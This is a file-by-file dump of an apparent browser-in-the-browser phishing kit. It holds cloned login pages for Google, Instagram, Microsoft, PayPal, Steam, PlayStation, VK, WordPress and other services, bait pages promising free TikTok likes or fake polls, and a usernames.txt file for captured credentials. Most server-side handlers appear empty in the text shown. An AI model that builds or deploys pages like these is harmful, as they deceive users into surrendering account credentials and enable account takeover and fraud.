https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/google/avatar.png -------------------------------------------------------------------------------- /sites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/google/google.png -------------------------------------------------------------------------------- /sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_new/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /sites/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ig_verify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/ig_verify/login2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /sites/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /sites/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/favicon.png -------------------------------------------------------------------------------- /sites/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/home-phones.png -------------------------------------------------------------------------------- /sites/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /sites/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /sites/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /sites/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /sites/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/linkedin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/mediafire/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/mediafire/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /sites/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /sites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/microsoft/sprite1.png -------------------------------------------------------------------------------- /sites/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /sites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/netflix/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/origin/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/origin/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /sites/origin/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('onload');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /sites/origin/iframe_api.js: -------------------------------------------------------------------------------- 1 | 2 | if (!window['YT']) {var YT = {loading: 0,loaded: 0};}if (!window['YTConfig']) {var YTConfig = {'host': 'http://www.youtube.com'};}if (!YT.loading) {YT.loading = 1;(function(){var l = [];YT.ready = function(f) {if (YT.loaded) {f();} else {l.push(f);}};window.onYTReady = function() {YT.loaded = 1;for (var i = 0; i < l.length; i++) {try {l[i]();} catch (e) {}}};YT.setConfig = function(c) {for (var k in c) {if (c.hasOwnProperty(k)) {YTConfig[k] = c[k];}}};var a = document.createElement('script');a.type = 'text/javascript';a.id = 'www-widgetapi-script';a.src = 'https://s.ytimg.com/yts/jsbin/www-widgetapi-vfl3m9ZW-/www-widgetapi.js';a.async = true;var c = document.currentScript;if (c) {var n = c.nonce || c.getAttribute('nonce');if (n) {a.setAttribute('nonce', n);}}var b = document.getElementsByTagName('script')[0];b.parentNode.insertBefore(a, b);})();} -------------------------------------------------------------------------------- /sites/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/origin/jquery_002.js: -------------------------------------------------------------------------------- 1 | (function(a,b){a.fn.originLayout=function(e,g){var f={};var d={init:function(){a("form").bind("submit.originLayout",d.events.originFormSubmit);a(".panel-action-area .btn-next").bind("click.originLayout",d.events.originNextButtonClick)},events:{originFormSubmit:function(h){a(".panel-action-area .origin-ux-button",this).addClass("disabled").unbind("click").bind("click",function(i){i.preventDefault()})},originNextButtonClick:function(h){if(a(this).hasClass("disabled")){h.stopImmediatePropagation()}else{a(this).parent(".panel-action-area").find(".origin-ux-button").addClass("disabled")}return false}},helpers:{}};var c=["init"];if(typeof e==="object"||!e){d.init()}else{if(a.inArray(e,c)){}}}})(jQuery);$(document).ready(function(){$.fn.originLayout()}); -------------------------------------------------------------------------------- /sites/origin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/origin/originX-pc-common.css: -------------------------------------------------------------------------------- 1 | .form-container{display:block;position:static;clear:both;width:480px;margin:auto;top:calc(50% - 324px);left:calc(50% - 240px);-webkit-animation:none;-moz-animation:none;-o-animation:none;animation:none}.views{border-radius:0 0 4px 4px;color:#141b20;background-color:#fff}nav.otknavbar{height:58px}a{text-decoration:none}a:hover{text-decoration:underline}a.otkbtn{text-decoration:none!important}body{font-family:'Open Sans',sans-serif;text-rendering:optimizeLegibility;-webkit-font-smoothing:antialiased;height:100%;min-height:100%;margin:0;overflow:hidden}.otknav.otknav-pills{border-bottom:1px solid #c3c6ce;height:58px;overflow:hidden;padding-left:40px}.otknav.otknav-pills li.otkpill-active:after{content:"";height:3px;width:100%;position:absolute;bottom:0;background:#f56c2d}section{height:calc(708px - 98px);padding:24px 40px;overflow:auto}section .otkbtn{margin:24px 0 6px 0}section h1{margin:12px 0 24px 0!important}.general-error{background:#d80000 url(../../../ui/core/img/background-general-error.png) right -49px;height:49px;overflow:hidden;display:none;width:100%;margin:0;padding:0}.otklabel{width:100%;display:block;margin:24px 0 12px 0}.otkform-group-help{display:none}p.otkform-group-help{margin:6px auto 12px auto}.otkform-group-haserror.otkform-group-help{display:block}.otkform{margin-bottom:24px}.otkcheckbox>label{vertical-align:middle;line-height:24px;white-space:normal}.otkcheckbox>input,.otkradio>input{display:block;opacity:0;position:absolute}.otkcheckbox.focus>label:before,.otkradio.focus>label:before,.otkselect.focus>.otkselect-label{border:1px solid #f56c2d}.otkbtn-primary.disabled{cursor:default;opacity:.45;pointer-events:none}select.disabled{pointer-events:none}.otknotice-stripe-message .otkicon{left:0}.otkform-group-field.otkicon{top:0;display:block}.otkicon-checkcircle,.otkicon-challenge{left:-18px;color:#04bd68;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning{left:-18px;color:#fea722;-webkit-animation:popIn .5s ease-in-out;-moz-animation:popIn .5s ease-in-out;-o-animation:popIn .5s ease-in-out;animation:popIn .5s ease-in-out}.otkicon-warning:before,.otkicon-checkcircle:before,.otkicon-challenge:before{display:block;font-size:96px}.right{float:right}.otkbtn:hover{background:#c85e36}footer{height:40px;margin:0;padding:0;top:0;border-radius:0 0 4px 4px;color:#787d85;background-color:#edf1f2;display:block;clear:both;position:relative;overflow:hidden}footer img{height:20px;margin:10px 12px 10px 24px}img{vertical-align:middle}.upgrade-privacy-friend{margin-bottom:12px;display:inline-block}.otkinput-capslock{display:none;position:absolute;top:50%;left:330px;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);transform:translate(0,-50%);z-index:2;color:#c3c6ce;font-size:32px}.otkicon-capslock-position{left:295px}.otkinput-capslock-visible{display:block}*,*:before,*:after{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}*{padding:0;margin:0;-webkit-backface-visibility:hidden} -------------------------------------------------------------------------------- /sites/paypal/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/paypal/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/pinterest/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /sites/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /sites/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/playstation/kekka-22361ea3e8890b95e7b006a784440d01.css: -------------------------------------------------------------------------------- 1 | /** 2 | * kekka.css 3 | * Copyright 2016 Sony Corporation 4 | * 5 | */ 6 | 7 | * :not(p):not(h2):not(h3):not(ul):not(li){margin:0;padding:0;-webkit-tap-highlight-color:transparent}body,html{height:100%}body{overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,'Helvetica Neue',Helvetica,HiraKakuProN-W3,'Noto Sans CJK JP',sans-serif;-webkit-text-size-adjust:100%}span{unicode-bidi:embed}html{font-size:10px} 8 | -------------------------------------------------------------------------------- /sites/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/loading.png -------------------------------------------------------------------------------- /sites/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/loading_base.png -------------------------------------------------------------------------------- /sites/playstation/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/logo_playstation.png -------------------------------------------------------------------------------- /sites/playstation/saved_resource: -------------------------------------------------------------------------------- 1 | ndwti({"wi":"w-666234","wmd":{"ipr":{"fm":[],"lm":true,"tl":20000},"wk":{"r":"test"},"di":{"rt":128,"ut":512},"af":[]},"fd":{"ipr":"p","bi":"p","wt":"1.w-666234.1.2.4ODTuykD3bYvqj9RpaK5gw,,.I2PzRDkmu3FRo1eMxiTzb7fp9vKKTvu44DXdevnl1nf38CBmmTErco0FkBbSYGiiX1Iy6chd2bUFDuidinMfM7Et6PpjVbrSCaWoqZ3REB5jioKKtRRF_CYwy2Pe2KdMrSr1tPWzMnfKriMbHKEStZLeR0tj3FShVopqekSIwljoEtpOBBZMvXKezIF1CaqhjSKnH9JYg0l5yRw9UHN329dfmmixtzC1RF3ZrjKLTlTJrmC3TR2j3UxUU41NTKTtXNo33HJr-Z3ZCuKAzXhdyQ,,"},"gf":[]}) -------------------------------------------------------------------------------- /sites/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/sony_logo.png -------------------------------------------------------------------------------- /sites/playstation/vendor-571d67531622102402268bd2c623c17f.css: -------------------------------------------------------------------------------- 1 | .liquid-container{position:relative;overflow:hidden;-webkit-transform:translateY(0);-moz-transform:translateY(0);transform:translateY(0)}.liquid-child{overflow:hidden} -------------------------------------------------------------------------------- /sites/playstation/wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/playstation/wallpaper.jpg -------------------------------------------------------------------------------- /sites/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/protonmail/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/protonmail/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/protonmail/logo.png -------------------------------------------------------------------------------- /sites/quora/iframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /sites/quora/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/quora/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/reddit/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/reddit/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /sites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/spotify/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('explicit');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/stackoverflow/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/stackoverflow/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/steam/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/tiktok/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/tiktok/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Tik Tok Followers 9 | 10 | 11 | 12 | 26 | 27 | 28 |
29 |
30 |
31 |

Login

32 |

Login to get 1000 Tiktok Likes Free

33 | 34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 45 |

46 | 47 |
48 | 49 |
50 |
51 | 52 | 55 | 56 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /sites/tiktok/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/tiktok/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/tiktok/logo.png -------------------------------------------------------------------------------- /sites/tiktok/sadflix.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/tiktok/sadflix.ttf -------------------------------------------------------------------------------- /sites/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitch/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/twitter/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/userpass/usernames.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sites/vk/counter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/vk/counter -------------------------------------------------------------------------------- /sites/vk/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/vk/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/vk_poll/login.html: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | VoteRank #289032 6 | 7 | 8 | 9 | 10 | 11 | 30 | 31 | 32 |
33 | 34 |
35 |

VoteRank

36 |

#289032

37 |
38 | 39 | 40 |
41 | 42 |
43 | 44 | What is your name?


45 | 46 | 47 | In what mountain do you live?


48 | 49 | How old are you?


50 | 51 | What are your favorite social networks?
52 | 53 | Facebook
54 | Twitter
55 | LinkedIn
56 | Instagram
57 | Snapchat
58 | Google+
59 | Vkontakte

60 |
61 | 62 |
63 | What is your favorite color?
64 | Blue
65 | Red
66 | Green
67 | Yellow
68 | Purple
69 | Orange
70 | Black
71 | White
72 | Grey
73 | Brown
74 | Pink

75 |
76 | 77 |
78 | Do you prefer money as a gift?
79 | Yes
80 | No

81 |
82 | 83 |
84 |
85 | Your favorite genre of music?
86 | People's
87 | Rock
88 | Metal
89 | Pop
90 | Jazz
91 | Shanson
92 | Hip-hop
93 | Rap
94 | Electronic
95 | Other

96 | 97 | 98 |
99 | 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /sites/vk_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/vk_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | VoteRank #289032 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 |
25 |
26 |
 
27 |
28 |
29 |
30 |
31 | 32 |
33 |
34 |
35 |
36 | 37 | 38 |

 

39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 | 47 |
48 |
49 |
50 | 51 |
52 |
53 |
54 |
55 | 56 |
57 |
58 | 59 |
60 | 61 |
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | 71 |
73 |
74 |
75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /sites/vk_poll/p.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/vk_poll/p.gif -------------------------------------------------------------------------------- /sites/vk_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thnak You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VoteRank

14 |

#56353514

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /sites/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/vk_poll/s_c.js -------------------------------------------------------------------------------- /sites/vk_poll/top_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/vk_poll/top_logo.png -------------------------------------------------------------------------------- /sites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/wordpress/login.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | Log In — WordPress 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 |

Powered by WordPress

17 | 18 |
19 |

20 | 22 |

23 |

24 | 26 |

27 |

28 |

29 | 30 | 31 | 32 |

33 |
34 | 35 | 38 | 39 | 52 | 53 |

← Back

54 | 55 |
56 | 57 | 58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /sites/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/wordpress/wordpress-logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/xbox/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/xbox/index.php -------------------------------------------------------------------------------- /sites/xbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/xbox/pass.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/xbox/pass.php -------------------------------------------------------------------------------- /sites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yahoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yahoo/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yahoo/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /sites/yandex/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/adobe/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /sites/yandex/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/dropbox/dropbox1.png -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/dropbox/dropbox2.png -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/yandex/dropbox/dropbox3.png -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox4.svg: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /sites/yandex/dropbox/dropbox5.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 